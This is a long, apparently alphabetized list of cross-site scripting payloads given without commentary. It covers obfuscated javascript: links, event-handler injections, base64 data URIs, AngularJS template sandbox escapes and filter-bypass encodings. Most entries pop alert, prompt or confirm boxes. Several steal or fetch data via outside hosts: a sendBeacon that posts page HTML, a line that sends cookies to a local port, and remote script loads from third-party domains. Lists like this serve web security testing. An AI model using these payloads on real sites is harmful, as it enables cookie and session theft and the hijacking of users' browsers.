a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();
<a href="javascript:alert(1)">XSS</a>
<a href=javascript:alert(1)>
<a href="javascript:alert(2)">a</a>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
<a/href=Java%0a%0d%09script:alert()>click
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<a href="data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=">Click Here</a> { Data URI XSS: data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= (PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=) : <script>alert('XSS')</script> }
"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"
<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap
<a/href="ja%0d%0avascr%0di%0apt:window['axlxexrt’ replace(/x/,")]()">CLICK ME
<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">
<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>
<a/href="jav%09%0dascri%09%0dpt%26%23x0000000000000000000000000000000003a; alert%26%23x28;%26%23x29;'>CLICK
<a/href="jav%09ascr%09ipt:window[la\lert’]()">Click me!</a>
<a href="jav%0Dascript:alert(1)">
<a href="javAascript:javascript:alert(1)">test1</a>
<a href="javaascript:javascript:alert(1)">test1</a>
<a href=javascript:javascript:alert(1)>XXX</a>
<a href=javas%26#99;ript:prompt%26#x28document.domain)>xss
<a+href="javascript#alert(1);">
<a href=javascript:alert(1)>
<a href="javascript:alert('Successful XSS')">Click this link!</a>
<a href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</a>
<a/href="javascript%0A%0D:alert()">
<a/href="javascript: javascript:prompt(1)"><input type="X">
<a href="javascript:alert(1)">a</a>
<a href=javascript:alert(1)>click
<a href=”javas cript:alert(document.cookie)” >Testing.com </a>
<a/href=javascript:alert()>click
<a href="jAvAsCrIpT:alert(1)">X</a>
<a href=javascript:alert(document.cookie)>Click Here</a>
<a href=javascript:confirm(1)>
<a href="javascript:\u0061le%72t(1)"><button>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>
<a href="javascript:var a=''-alert(1)-''">a</a>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<a/href="javascript:allrt()">CLICK ME
"><a href=jav
ascript:top[8680439..toString(30)](document.domain)>Click</a>
<a href="javascript:alert(3)">a</a>
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>
<a/href="j	a	v	asc	ri	pt:alert(1)">
<a href=[]" onmouseover=prompt(1)//">XYZ</a>
<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
<a href="   javascript:alert('Successful XSS')">Click this link!</a>
<a id=x tabindex=1 onfocus=alert(1)></a>
[a](j a v a s c r i p t:prompt(document.cookie))
[a](javascript:prompt(document.cookie))
[a](javascript:window.onerror=alert;throw%201)
”al”;b=”ert”;self[a+b]();
(alert)()
";alert(0);//
'-alert(0)-'
[alert][0].call(this,1)
"}]}';alert(1);{{'
#'-alert(1)-'
#"-alert(1)}//
#";alert(1);//
#\'-alert(1)//
#alert`1`
');alert(1)//
'-alert(1)-'
'-alert(1)//
'|alert(1)|'
('+'alert(1)+')();
(alert)(1)
+alert(1)+
-alert(1)-'
.alert(1);
/*alert(1)*/
; alert(1);//
"-alert(1)}//
";alert(1);//
\'-alert(1)//
{{{}.")));alert(1)//"}}
{}.")));alert(1)//";
alert(1)
alert?.(1)
alert`1`
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
;alert(123);
";alert(123);t="
#';alert(123);t='
';alert(123);t='
-alert(1)-'
"])},alert(1));(function xss() {//
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
'alert(1)'.replace(/.+/,eval)
>alert(1)</script>
*/alert(1)</script><script>/*
'>alert(1)</script><script/1='
["');alert('1’);//"]@xyz.xxx
-alert(23)/
alert`23`
"};alert(23);a={"a":
#alert(document['cookie'])
');alert(document.cookie)();//
';alert(document.cookie)//
'});alert(document.cookie);//'
{alert('document.cookie')}
alert(document['cookie'])
alert?.(document?.cookie)
"alert(document.cookie)['script'](2);"
';alert(document.domain)//
alert(document.domain)
';alert("ibrahimxss");//
alert##<script>prompt(1234)</script>
";alert(String.fromCharCode(88,83,83))
//";alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
alert(String.fromCharCode(88))
alert = window["al"+"ert"]
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
\";alert('XSS');//
["');alert('xss');//"]@xyz.xxx
["');alert('XSS');//"]@xyz.xxx
"}]}';alert('You got XSSed')
al\u0065rt(1)
">a
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>alert(1)</script>
"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;
"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;lt;img/src/onerror=alert(`coffinxp`)&amp;amp;gt;
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;lt;img/src/onerror=alert(`coffinxp`)&amp;gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
"&gt;&lt;svg onload=alert(1)&gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
"&lt;img src=1 onerror=alert(1)&gt;
&lt;img src=1 onerror=alert(1)&gt;
&lt;img/src/onerror=alert(`coffinxp`)&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
"><img src=x onerror=prompt(document.domain);>
"><svg onload=alert(1)>
”><svg onload=alert&#0000000040"1")>
"<img src=1 onerror=alert(1)>
<img src=1 onerror=alert(1)>
<img/src/onerror=alert(`coffinxp`)>
<script>alert(1)</script>
anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
anythinglr00alert(document.domain)uxldz
(A("onerror='alert`1`'testabcd))/
& apos;>alert(2);
";a=prompt,a()//
';a=prompt,a()//
";a=prompt,a(1)//
asdf"onload%3d"alert('Slax Was Here!')"asdf
asd"`> onpointerenter=x=prompt,x`XSS`
//?aspxerrorpath=alert(1)
">Click
?>Click
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}
a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=# onerror=alert(1)${b}/.source)`
">
/* */
“autofocus onclick=’alert()’
“autofocus onclick=’alert()
" autofocus onfocus=alert(1)
"autofocus/onfocus=alert(1)//
"autofocus onfocus='alert(document.domain)'
autofocus ' onfocus='alert(document.domain)'
“autofocus onFocUs=’find(l\u{6F}cati\u{6F}n=`j	avascr
ipt:al	ert()`)’
" autofocus onkeyup="javascript:alert(123)
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
test
banner.swf?clickTAG=javascript:alert(1);//
%BCscript%BEalert(%A21%A2)%BC/script%BE
blah(""+new class b{toString=e=>location=name}+"")
#blalala');alert(1);('a
blalala');alert(1);('a
click
dragme
Right click me<!--
<body background="javascript:alert('Successful XSS')">
<BODY BACKGROUND="javascript:alert('XSS')">
<body language=vbs onload=confirm-1
<body onactivate=alert(1)>
<body onbeforeprint=console.log(1)>
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onfocusin=alert(1)>
<body onhashchange="print()">
<body oninput=javascript:alert(1)><input autofocus>
<body oninput=javascript:alert(/AmoloHT/)><input autofocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
#<body onload=alert(“bingo”)>
<body onload=alert(“bingo”)>
#<body onload="alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<body onload=alert(/XSS/.source)>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<body/onload=<!-->
alert(1)>
"<body/onload=<!-->
confirm(1);prompt(/XSS/.source)>"
""><body/onload=<!-->
confirm(1);prompt(/XSS/.source)>",
<body onload="window.alert('XSS_WAF_BYPASS')">
"><body/onload="{x:onerror=alert};x"
"><body/onload="{x:onerror=alert};x"
<body onmessage=print()>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onorientationchange=alert(1)>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<body onpageshow=alert(1)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"/><body onpageshow-prompt`assassin`//
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<body onpopstate=print()>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<body onresize="print()">
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchstart=alert(1)>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
breakout"/href="javas%26%23x63 ;ript:selffalx\ert%'.replace(/x/,"]()"
<BR SIZE="&{alert('XSS')}">
<BR SIZE="&{javascript:alert(1)}">
</br style=a:expression(alert(1))>
<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>
<b <script>alert(1)</script>0
'+ '</b><script>alert(document.cookie)</script><b><!--'
</b><script>alert(document.cookie)</script><b><!--
<button autofocus onfocus=alert(1)>test</button>
<button autofocus onfocus=confirm(2)>
<button formaction="javascript:alert('XSS')">Click me</button>
<button onClick="alert('xss')">Submit</button>
%c0″//(0000%0dconfirm(1)//
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
{{c=%27%27.sub.call;b=%27%27.sub.bind;a=%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync(%22astNode=pop();astNode.type=%27UnaryExpression%27;astNode.operator=%27(window.X?void0:(window.X=true,alert(document.domain)))+%27;astNode.argument={type:%27Identifier%27,name:%27foo%27};%22);m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=%27%27.sub;$eval(%27a(b.c)%27);[].push.apply=a;}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('alert(document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?voide:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('prompt("Enter something:", document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}
"));}catch(e){confirm(document.domain);}//
"));}catch(e){confirm(document.domain)}//
;"))}catch(e) {confirm(document.location);}//
;\"))}catch(e) {confirm(document.location);}//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
{{_c.constructor('alert(1)')()}}
'`"><*chr*script>log(*num*)</script>
coffinxp"*alert(1)*"
<command onclick="alert('XSS')">Command</command>
//comment%0a%0dalert(0);
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">
<component is=script text=alert(1)>
"-confirm(1)-"
#'-confirm(1)-
#*/confirm(1)
');confirm(1);//
'-confirm(1)-
\');confirm(1);//
\”-confirm`1`//
\”}})})-confirm`1`;({{/*///
confirm?.(1)
\”}})})-confirm`1`(a=>{({b:{/*///
\”}})})-confirm`1`;(function(){({if(){/*///
confirm(1)".replace(/.+/,eval)//
confirm(1)>>>/xss
'+confirm(9)&&null=='
'-confirm(document.cookie)-'
#'confirm(document.domain)'>
'-confirm(document.domain)-'
'confirm(document.domain)'>
-(confirm)(document.domain)//
";confirm(document.location);//
confirm(document.location)
confirm(document.selection.createRange().getBookmark())
confirm(location.hostname)
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";
confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--
confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>'));
confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click'));
confirm(window.toStaticHTML('<marquee>foo</marquee>'));
confirm(<xss>xs{[function::status]}s</xss>)
<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>
console.log(document.domain)
{{constructor.constructor(‘a=document;confirm(a.domain)’)()}}
{{constructor.constructor("alert(0)")()}}
#{{constructor.constructor(alert`1`)()}}
#constructor.constructor('alert(1)')()
{{''.constructor.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor(‘alert(1)’)()}}
{{constructor.constructor(alert`1`)()}}
constructor.constructor('alert(1)')()
[[constructor.constructor('alert(document.cookie)')()]]
{{{{constructor.constructor('alert("XSS")')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp\'))')()}}
{{constructor.constructor('eval(atob("YWxlcnQoMSk="))')()}}
{{constructor.constructor('prompt(1)')()}}
{{constructor.constructor(valueOf.name.constructor.fromCharCode(97,108,101,114,116,40,49,41,10))()}}
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}
{{c=''.sub.call;b=''.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on; C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='alert(1)';astNode.argument={type:'Identifier'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)');}}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
“><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
<d3v/onauxclick=[2].some(confirm)>click
<d3v/onauxclick=(((confirm)))``>click
<d3v/onmouseleave=[2].some(confirm)>click
d="alert('XSS');")";
<data id=x tabindex=1 onfocus=alert(1)></data>
<datalist id="xss"><option value="<script>alert('XSS')</script>"></datalist>
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:text/html,<script>alert(0)</script>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<details onauxclick=confirm`xss`></details>
<details+/'on+/ontoggle=1^confirm(document.domain)+open//
<details ontoggle=alert(1) open>test</details>
<details open id="' "'"ontoggle=alert(1)>
<details/open/ontoggle=alert()>
<details/open/ontoggle="alert`1`">
<details open ontoggle="{alert`1`}"></details>
<details open ontoggle="alert(1)"><summary>Click me!</summary></details>
<details/open/ontoggle=(confirm)()//
">'><details/open/ontoggle=confirm('XSS')>
>'><details/open/ontoggle=confirm('XSS')>
"><details/open/ontoggle=confirm("/xss_by_Y000!/")>
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX</a>
"><details/open/ontoggle=prompt("/test/")>
<details open ontoggle='self["ale"%2b"rt"](document.domain)'>
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
"><div class=progress><div onwebkitanimationstart=prompt(document.domain)>
<div data-url="javascript:alert('XSS')"></div>
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
'">><div><meter onmouseover="alert(1)"</div>"
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<div oncopy="alert('XSS')">Copy me</div>
<div onkeyup="alert('XSS')">Press a key</div>
<div/onmouseover='alert(1)'> style="x:">
<div onmouseover='alert(1)'>DIV</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">
<DIV STYLE="background-image: url(,javascript:alert('XSS))">
<DIV+STYLE="background-image: url(javascript:alert(1))">
<div style="background-image:url(javascript:alert('Successful XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
<div style="border-image-source: url(javascript:alert('XSS'));">
<div style="content: url(javascript:alert('XSS'));">
<div style="cursor: url(javascript:alert('XSS')), auto;">
<div style="list-style-image: url(javascript:alert('XSS'));">
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<div style="width:expression(alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<div/style="width:expression(confirm(1))">X</div> {IE7}
<DIV STYLE="width:expression(javascript:alert(1));">
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
";document.body.addEventListener("DOMActivate",confirm(1))//
document.body.innerHTML=('<00i00mg src=xx:x onerror=confirm(1)>')
document.body.innerHTML=document.body.innerText
document.body.innerHTML="<img src=x onerror=alert(23)>"
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document['cookie']
document.createElement('div').innerHTML = "<img src=1 onerror=alert()>
'() {'document.createElement('img').src='javascript:while(1){}'
document['default'+'View'][`\u0061lert`](3)
'-[document.domain].map(alert)-'
document.location='javascript:alert%2823%29'
',document.location='javascript:document.domain','
document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>')
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(coffinxp`)>
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><img src=x onerror=prompt(document.domain);>
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20<script>prompt(document.domain)</script>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie%3A%20whoami%3Dthecyberneh%25u2028%25u2029XSS-Payload%3A%2520%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
